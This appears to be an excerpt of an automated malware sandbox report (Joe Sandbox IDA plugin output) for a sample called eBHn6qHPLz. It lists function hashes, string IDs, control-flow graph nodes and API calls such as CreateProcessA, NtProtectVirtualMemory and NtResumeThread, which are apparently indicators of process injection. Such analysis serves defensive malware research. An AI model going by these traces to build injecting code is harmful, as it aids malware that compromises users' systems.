                                                                                                • Instruction ID: 66ba3b32c4a83354afaef885ecc9314c42219f7083247271244db3d1c5358039
                                                                                                • Opcode Fuzzy Hash: 73e4f40c707e217536932b32421b9adb982ee18353dbb92caab46c8c22e9eea9
                                                                                                • Instruction Fuzzy Hash: 7D711835E006198FEB24DF69D950BDABBB2FF89304F1481AAD50DA7254DB306E85CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: f69b05ef290f5dec0b44639dfc838307fa3c7ccf9fe31509dd0c0237697d4436
                                                                                                • Instruction ID: d869b52baecb32a971a07f608cf2b4c61018c46849ee270e917ed1bc85818173
                                                                                                • Opcode Fuzzy Hash: f69b05ef290f5dec0b44639dfc838307fa3c7ccf9fe31509dd0c0237697d4436
                                                                                                • Instruction Fuzzy Hash: D7427774B0061A8FDB18DF69C49466EBBF2FF88300F248969E55AD7391DB34AD01DB90
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C0E50A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 20ad56c6c92ccb133c92c80084f4ae5d230847eea72c79fe8c2c21203d2bfd3f
                                                                                                • Instruction ID: 0036920cf5584463383b625c58425b9c4d3ece729bf0a843b4d4bd055193e453
                                                                                                • Opcode Fuzzy Hash: 20ad56c6c92ccb133c92c80084f4ae5d230847eea72c79fe8c2c21203d2bfd3f
                                                                                                • Instruction Fuzzy Hash: 3BA13971E402199FDB10CFA9C9817EEBBF2FB48314F14892AE859E7284D774A941CF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 2a3b5e8bd8683af72a135ea0f94a307ab768edd7f7d7a26e216998d6544eec81
                                                                                                • Instruction ID: fce1f1ea15d06df3c461b60a00e3d3abe38df37208ff308d7efd9ae8c4173540
                                                                                                • Opcode Fuzzy Hash: 2a3b5e8bd8683af72a135ea0f94a307ab768edd7f7d7a26e216998d6544eec81
                                                                                                • Instruction Fuzzy Hash: B812F474A05218CFEBA4DF69DA85BDAB7F2BB89300F1080AAD50DA7355DB305E85CF50
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C0D959
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 74dcb93da57af0448493a2d5f37b7a31705e898b6db186059302371d6ecfddfb
                                                                                                • Instruction ID: 6d2bbd1671efcb4df6765e52fc9d84f6b0cc65e53e51012a14ab5a1f0fde906a
                                                                                                • Opcode Fuzzy Hash: 74dcb93da57af0448493a2d5f37b7a31705e898b6db186059302371d6ecfddfb
                                                                                                • Instruction Fuzzy Hash: E92113B19013499FCB10DFAAD980ADEFBF5FF48310F20842EE859A7250C735A944CBA1
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C0D959
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 85af929fcc1d962f9a70f9d89565ba8c1f818298aeb3a1af66793ca5bb5d320e
                                                                                                • Instruction ID: a63a8b019c9a582aa1518796929e2e161c8591b82fa00a06e7633fb600011853
                                                                                                • Opcode Fuzzy Hash: 85af929fcc1d962f9a70f9d89565ba8c1f818298aeb3a1af66793ca5bb5d320e
                                                                                                • Instruction Fuzzy Hash: 202100B1D003499FCB10DFAAD980ADEFBF5FF48320F20842AE419A7250C775A940CBA5
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C0D959
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 8e4bf23265ae076506ea108398b6ffce8de839f9ffb37d0890f8a574c5c1dc14
                                                                                                • Instruction ID: d665be98c7c7f7f0ded408a110be4f772060c7d881df6ad346a375b870a81114
                                                                                                • Opcode Fuzzy Hash: 8e4bf23265ae076506ea108398b6ffce8de839f9ffb37d0890f8a574c5c1dc14
                                                                                                • Instruction Fuzzy Hash: 00110071D003488FDB00DFA8E8847EEBFF1EF49314F14841AD059A72A1CB349941CBA1
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 04C0FA8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: bfd361f23b587a44cdb8230e018748e1f7c5213b275abb2401fc88df33e2be28
                                                                                                • Instruction ID: 3555b182b8610f89bf55fcd185812202934f609f198cd302299ea0f84672b167
                                                                                                • Opcode Fuzzy Hash: bfd361f23b587a44cdb8230e018748e1f7c5213b275abb2401fc88df33e2be28
                                                                                                • Instruction Fuzzy Hash: B62113B19042499ADB20DFAAC44479EFBF4AF89324F14842ED459A7250C774A944CBA5
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 04C0FA8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 4443c190227ddb99c2459699063e37b884611545fe999b083b8e0e549cc5df7e
                                                                                                • Instruction ID: 0c0e046623e97621f61b07dbfc958f9266bbb9f8a2e687b09eff021a330cf912
                                                                                                • Opcode Fuzzy Hash: 4443c190227ddb99c2459699063e37b884611545fe999b083b8e0e549cc5df7e
                                                                                                • Instruction Fuzzy Hash: F511E4B1D002498FDB20DFAAC484A9FFBF5EF88324F14842ED459A7250CB74A944CFA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891954330.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6870000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Deq
                                                                                                • API String ID: 0-948982800
                                                                                                • Opcode ID: aa5b88a2d9f4ff88934a67e6c10c18fc9a056ae481c622b76b7a7dc9f8f4cbf7
                                                                                                • Instruction ID: 9ba9c3d317777cbbf6b6644af047dfe52f5ef405fc8b3e930f1626a4249153e9
                                                                                                • Opcode Fuzzy Hash: aa5b88a2d9f4ff88934a67e6c10c18fc9a056ae481c622b76b7a7dc9f8f4cbf7
                                                                                                • Instruction Fuzzy Hash: C0D1BF74E00218CFDB54DFA9DA94A9DBBF2FF89304F1080A9D409AB365DB35A981CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 2ded59c0ac4cfdabc1a1d2a7e68520c0e718a19ff2b01739911a7757f3da466d
                                                                                                • Instruction ID: be59e36bb1481bb95efe502d9c2d386a5d6fa1bc6c02b9a0ba500b6c262c1351
                                                                                                • Opcode Fuzzy Hash: 2ded59c0ac4cfdabc1a1d2a7e68520c0e718a19ff2b01739911a7757f3da466d
                                                                                                • Instruction Fuzzy Hash: E0B1D470E15208CFEB54DFA9D984BDDBBF2BB49304F6090AAD419A7355DB309946CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: b51b7aecaa11224501cea2b31622c3a96dde6c18419325baa8d2e42e8a4365a8
                                                                                                • Instruction ID: 1705d565aae5ae8246f3ba92f80dae517555d189d9c5adb1da35eb3293b729f4
                                                                                                • Opcode Fuzzy Hash: b51b7aecaa11224501cea2b31622c3a96dde6c18419325baa8d2e42e8a4365a8
                                                                                                • Instruction Fuzzy Hash: 64B1C474E11208CFEB54DFA9D984BDEBBF2BB89304F6090AAD409A7355DB309945CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n
                                                                                                • API String ID: 0-2013832146
                                                                                                • Opcode ID: a5452b976ad6cb9a8a4e5d84c0dab63bf74c7d4cbf972d67f6002a3f9b042710
                                                                                                • Instruction ID: afe6ea99751dd693fa6dc03b6361377ecefddbe19e0d354037e378c5c6eaa9ae
                                                                                                • Opcode Fuzzy Hash: a5452b976ad6cb9a8a4e5d84c0dab63bf74c7d4cbf972d67f6002a3f9b042710
                                                                                                • Instruction Fuzzy Hash: 8041F5B4E05218DBDB44CFAAC888B9DBBF6FB89304F14C0AAD808AB355D7745945CF00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 346e0f68fc66ad0d532e54b6d87df18e373dedb640324a8e636144a09dfbb004
                                                                                                • Instruction ID: 958c78f184c1d1253f9435be61c2c6f1451be1bdc3e7ee487c2fca0ab165b4aa
                                                                                                • Opcode Fuzzy Hash: 346e0f68fc66ad0d532e54b6d87df18e373dedb640324a8e636144a09dfbb004
                                                                                                • Instruction Fuzzy Hash: 9F02E474A052188FDB64DF68DA85BAEBBF1EB49304F1090EAD50DA7345DB30AE85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6e96eccc144b041c3736846369de98963a57e7f411f3bc10ee6efcc7be5e3ce
                                                                                                • Instruction ID: 0491f4521081df81fc3036eddd3f1afe2f55917fd4fbeab81cce54b1e3213e9b
                                                                                                • Opcode Fuzzy Hash: f6e96eccc144b041c3736846369de98963a57e7f411f3bc10ee6efcc7be5e3ce
                                                                                                • Instruction Fuzzy Hash: C5D1D274A04218CFEB54DFA9D984B9DBBF2FB49305F1091AAD409A7395EB30AD85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40f3c8f61edc99393ae9479e76da2e187511c5cd47ebca5301a45b2572b95727
                                                                                                • Instruction ID: 9704dbbb8d98b6fde022c1c9db281a1c6cf3cd75cb71fe1eef91ec288ec975ea
                                                                                                • Opcode Fuzzy Hash: 40f3c8f61edc99393ae9479e76da2e187511c5cd47ebca5301a45b2572b95727
                                                                                                • Instruction Fuzzy Hash: 35D1B274A00218CFDB54DFA9D985B9DBBF2FB49305F1091AAD409A7395DB30AD85CF00

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1133 eecb08-eecba7 GetCurrentProcess 1137 eecba9-eecbaf 1133->1137 1138 eecbb0-eecbe4 GetCurrentThread 1133->1138 1137->1138 1139 eecbed-eecc21 GetCurrentProcess 1138->1139 1140 eecbe6-eecbec 1138->1140 1142 eecc2a-eecc45 call eecce7 1139->1142 1143 eecc23-eecc29 1139->1143 1140->1139 1145 eecc4b-eecc7a GetCurrentThreadId 1142->1145 1143->1142 1147 eecc7c-eecc82 1145->1147 1148 eecc83-eecce5 1145->1148 1147->1148
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EECB96
                                                                                                • GetCurrentThread.KERNEL32 ref: 00EECBD3
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EECC10
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EECC69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 3d5e45a4cda7c60d323c75622f5dad2d5d4c23e5e428f07f0a6cd16275f198b3
                                                                                                • Instruction ID: d2c53efdf46e20c7211f1351b2d553a8fe8916e84af2ebbe17b4ccc5414259ed
                                                                                                • Opcode Fuzzy Hash: 3d5e45a4cda7c60d323c75622f5dad2d5d4c23e5e428f07f0a6cd16275f198b3
                                                                                                • Instruction Fuzzy Hash: 555144B09002498FDB14DFAAD649BAEBFF1AF88304F248459E019A7360DB749985CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1155 eecb18-eecba7 GetCurrentProcess 1159 eecba9-eecbaf 1155->1159 1160 eecbb0-eecbe4 GetCurrentThread 1155->1160 1159->1160 1161 eecbed-eecc21 GetCurrentProcess 1160->1161 1162 eecbe6-eecbec 1160->1162 1164 eecc2a-eecc45 call eecce7 1161->1164 1165 eecc23-eecc29 1161->1165 1162->1161 1167 eecc4b-eecc7a GetCurrentThreadId 1164->1167 1165->1164 1169 eecc7c-eecc82 1167->1169 1170 eecc83-eecce5 1167->1170 1169->1170
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EECB96
                                                                                                • GetCurrentThread.KERNEL32 ref: 00EECBD3
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EECC10
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EECC69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: efa27407b145ede6d3980c303444d1178cd3164836c35fea72908cd4011b6e02
                                                                                                • Instruction ID: 6e0056dd5441756b9fd5681742b4a5574f91e66865aace910f3e91e6cc669c45
                                                                                                • Opcode Fuzzy Hash: efa27407b145ede6d3980c303444d1178cd3164836c35fea72908cd4011b6e02
                                                                                                • Instruction Fuzzy Hash: 545155B09002498FDB14DFAAD549BAEBFF1EF88304F20C459E019A7360DB749985CF69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1177 eea488-eea497 1178 eea499-eea4a6 call ee97e4 1177->1178 1179 eea4c3-eea4c7 1177->1179 1186 eea4bc 1178->1186 1187 eea4a8 1178->1187 1180 eea4db-eea51c 1179->1180 1181 eea4c9-eea4d3 1179->1181 1188 eea51e-eea526 1180->1188 1189 eea529-eea537 1180->1189 1181->1180 1186->1179 1234 eea4ae call eea720 1187->1234 1235 eea4ae call eea711 1187->1235 1188->1189 1190 eea55b-eea55d 1189->1190 1191 eea539-eea53e 1189->1191 1194 eea560-eea567 1190->1194 1195 eea549 1191->1195 1196 eea540-eea547 call ee97f0 1191->1196 1192 eea4b4-eea4b6 1192->1186 1193 eea5f8-eea605 1192->1193 1207 eea60b-eea670 1193->1207 1198 eea569-eea571 1194->1198 1199 eea574-eea57b 1194->1199 1197 eea54b-eea559 1195->1197 1196->1197 1197->1194 1198->1199 1201 eea57d-eea585 1199->1201 1202 eea588-eea591 call ee9800 1199->1202 1201->1202 1208 eea59e-eea5a3 1202->1208 1209 eea593-eea59b 1202->1209 1227 eea672-eea6b8 1207->1227 1210 eea5a5-eea5ac 1208->1210 1211 eea5c1-eea5c5 1208->1211 1209->1208 1210->1211 1213 eea5ae-eea5be call ee9810 call ee9820 1210->1213 1236 eea5c8 call eeaa20 1211->1236 1237 eea5c8 call eeaa10 1211->1237 1213->1211 1214 eea5cb-eea5ce 1217 eea5d0-eea5ee 1214->1217 1218 eea5f1-eea5f7 1214->1218 1217->1218 1229 eea6ba-eea6bd 1227->1229 1230 eea6c0-eea6eb GetModuleHandleW 1227->1230 1229->1230 1231 eea6ed-eea6f3 1230->1231 1232 eea6f4-eea708 1230->1232 1231->1232 1234->1192 1235->1192 1236->1214 1237->1214
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEA6DE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: 8Q$8Q
                                                                                                • API String ID: 4139908857-250438889
                                                                                                • Opcode ID: d17516630b3727c375d40d52cea32ef33e7b0210f343ce07b95316dac9c6ef9b
                                                                                                • Instruction ID: 597eef201fab6b62668b417be7ec5f879e5ab44719900ab7c315a218ba57ee10
                                                                                                • Opcode Fuzzy Hash: d17516630b3727c375d40d52cea32ef33e7b0210f343ce07b95316dac9c6ef9b
                                                                                                • Instruction Fuzzy Hash: AC813470A00B498FD724DF2AD04575ABBF1BF88304F04892EE49AA7B50DB74F949CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1238 4ba73e0-4ba7408 1240 4ba740a-4ba7451 1238->1240 1241 4ba7456-4ba7464 1238->1241 1289 4ba78ad-4ba78b4 1240->1289 1242 4ba7473 1241->1242 1243 4ba7466-4ba7471 call 4ba4b08 1241->1243 1245 4ba7475-4ba747c 1242->1245 1243->1245 1248 4ba7482-4ba7486 1245->1248 1249 4ba7565-4ba7569 1245->1249 1252 4ba748c-4ba7490 1248->1252 1253 4ba78b5-4ba78dd 1248->1253 1250 4ba756b-4ba757a call 4ba2d10 1249->1250 1251 4ba75bf-4ba75c9 1249->1251 1267 4ba757e-4ba7583 1250->1267 1258 4ba75cb-4ba75da call 4ba24c8 1251->1258 1259 4ba7602-4ba7628 1251->1259 1256 4ba74a2-4ba7500 call 4ba4848 call 4ba52b0 1252->1256 1257 4ba7492-4ba749c 1252->1257 1263 4ba78e4-4ba790e 1253->1263 1298 4ba7973-4ba7988 1256->1298 1299 4ba7506-4ba7560 1256->1299 1257->1256 1257->1263 1272 4ba75e0-4ba75fd 1258->1272 1273 4ba7916 1258->1273 1285 4ba762a-4ba7633 1259->1285 1286 4ba7635 1259->1286 1263->1273 1274 4ba757c 1267->1274 1275 4ba7585-4ba75ba call 4ba72b0 1267->1275 1272->1289 1283 4ba791e-4ba792c 1273->1283 1274->1267 1275->1289 1300 4ba7934-4ba796c 1283->1300 1291 4ba7637-4ba765f 1285->1291 1286->1291 1303 4ba7730-4ba7734 1291->1303 1304 4ba7665-4ba767e 1291->1304 1298->1283 1310 4ba798a-4ba799d 1298->1310 1299->1289 1300->1298 1308 4ba77ae-4ba77b8 1303->1308 1309 4ba7736-4ba774f 1303->1309 1304->1303 1331 4ba7684-4ba7693 call 4ba22f0 1304->1331 1312 4ba77ba-4ba77c4 1308->1312 1313 4ba7815-4ba781e 1308->1313 1309->1308 1334 4ba7751-4ba7760 call 4ba22f0 1309->1334 1316 4ba799f-4ba79a5 1310->1316 1317 4ba79a7-4ba79ad 1310->1317 1329 4ba77ca-4ba77dc 1312->1329 1330 4ba77c6-4ba77c8 1312->1330 1319 4ba7820-4ba784e call 4ba4040 call 4ba4060 1313->1319 1320 4ba7856-4ba78a3 1313->1320 1316->1317 1321 4ba79ae-4ba79eb 1316->1321 1319->1320 1381 4ba78a5 call 4ba7c30 1320->1381 1382 4ba78a5 call 4ba7c21 1320->1382 1336 4ba77de-4ba77e0 1329->1336 1330->1336 1351 4ba76ab-4ba76c0 1331->1351 1352 4ba7695-4ba769b 1331->1352 1358 4ba7778-4ba7783 1334->1358 1359 4ba7762-4ba7768 1334->1359 1345 4ba780e-4ba7813 1336->1345 1346 4ba77e2-4ba77e6 1336->1346 1340 4ba78ab 1340->1289 1345->1312 1345->1313 1347 4ba77e8-4ba7801 1346->1347 1348 4ba7804-4ba7809 call 4ba10f0 1346->1348 1347->1348 1348->1345 1354 4ba76c2-4ba76ee call 4ba3190 1351->1354 1355 4ba76f4-4ba76fd 1351->1355 1360 4ba769f-4ba76a1 1352->1360 1361 4ba769d 1352->1361 1354->1300 1354->1355 1355->1298 1366 4ba7703-4ba772a 1355->1366 1358->1298 1369 4ba7789-4ba77ac 1358->1369 1367 4ba776a 1359->1367 1368 4ba776c-4ba776e 1359->1368 1360->1351 1361->1351 1366->1303 1366->1331 1367->1358 1368->1358 1369->1308 1369->1334 1381->1340 1382->1340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Hbq$Hbq$Hbq
                                                                                                • API String ID: 0-2297679979
                                                                                                • Opcode ID: e0c3b2dd84f9517bde14c061bd4cc65a152907002e5132a83d24be9fc9682d12
                                                                                                • Instruction ID: f154cfb66309c0e9df585f8517186b74ea4abe686bfdb6645b4d2b14e9c4adc0
                                                                                                • Opcode Fuzzy Hash: e0c3b2dd84f9517bde14c061bd4cc65a152907002e5132a83d24be9fc9682d12
                                                                                                • Instruction Fuzzy Hash: 94124F31A042049FCB24DFA9C494A6EBBF2FF88300F248969E44A9B355DF35ED56CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1383 4ba9218-4ba9255 1385 4ba9277-4ba928d call 4ba9020 1383->1385 1386 4ba9257-4ba925c call 4ba9b88 1383->1386 1392 4ba9603-4ba9617 1385->1392 1393 4ba9293-4ba929f 1385->1393 1388 4ba9262-4ba9264 1386->1388 1388->1385 1390 4ba9266-4ba926e 1388->1390 1390->1385 1402 4ba9657-4ba9660 1392->1402 1394 4ba93d0-4ba93d7 1393->1394 1395 4ba92a5-4ba92a8 1393->1395 1398 4ba93dd-4ba93e6 1394->1398 1399 4ba9506-4ba9540 call 4ba8a28 1394->1399 1396 4ba92ab-4ba92b4 1395->1396 1400 4ba92ba-4ba92ce 1396->1400 1401 4ba96f8 1396->1401 1398->1399 1403 4ba93ec-4ba94f8 call 4ba8a28 call 4ba8fb8 call 4ba8a28 1398->1403 1498 4ba9543 call 4bab9d0 1399->1498 1499 4ba9543 call 4bab9c1 1399->1499 1417 4ba93c0-4ba93ca 1400->1417 1418 4ba92d4-4ba9369 call 4ba9020 * 2 call 4ba8a28 call 4ba8fb8 call 4ba9060 call 4ba9108 call 4ba9170 1400->1418 1405 4ba96fd-4ba9701 1401->1405 1407 4ba9662-4ba9669 1402->1407 1408 4ba9625-4ba962e 1402->1408 1494 4ba94fa 1403->1494 1495 4ba9503 1403->1495 1414 4ba970c 1405->1414 1415 4ba9703 1405->1415 1411 4ba966b-4ba96ae call 4ba8a28 1407->1411 1412 4ba96b7-4ba96be 1407->1412 1408->1401 1410 4ba9634-4ba9646 1408->1410 1430 4ba9648-4ba964d 1410->1430 1431 4ba9656 1410->1431 1411->1412 1419 4ba96e3-4ba96f6 1412->1419 1420 4ba96c0-4ba96d0 1412->1420 1426 4ba970d 1414->1426 1415->1414 1417->1394 1417->1396 1475 4ba936b-4ba9383 call 4ba9108 call 4ba8a28 call 4ba8cd8 1418->1475 1476 4ba9388-4ba93bb call 4ba9170 1418->1476 1419->1405 1420->1419 1433 4ba96d2-4ba96da 1420->1433 1426->1426 1496 4ba9650 call 4bac16a 1430->1496 1497 4ba9650 call 4bac170 1430->1497 1431->1402 1433->1419 1442 4ba9549-4ba95fa call 4ba8a28 1442->1392 1475->1476 1476->1417 1494->1495 1495->1399 1496->1431 1497->1431 1498->1442 1499->1442
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q
                                                                                                • API String ID: 0-1196845430
                                                                                                • Opcode ID: 5a3816f7d13ca6a4fd7a33d81594647abdb4e9fa914af103feaf6d2622090673
                                                                                                • Instruction ID: 0bf3450e56c3d6f849a9c265e8e2393f5963ad6d9b4ecb5502a135d4a3c3383c
                                                                                                • Opcode Fuzzy Hash: 5a3816f7d13ca6a4fd7a33d81594647abdb4e9fa914af103feaf6d2622090673
                                                                                                • Instruction Fuzzy Hash: DDF1EB74A10218DFDB04DFA4D998A9DBBB2FF89304F158598E406AB3A5DB71FC42CB50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
